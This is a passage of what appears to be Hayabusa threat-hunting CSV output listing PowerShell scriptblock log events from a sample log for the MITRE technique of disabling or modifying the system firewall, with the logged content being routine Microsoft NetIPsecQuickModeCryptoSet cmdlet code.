[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdleti",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"em.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' -Alias '*' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdleti",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"zation_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' -Alias '*' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"zation_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName 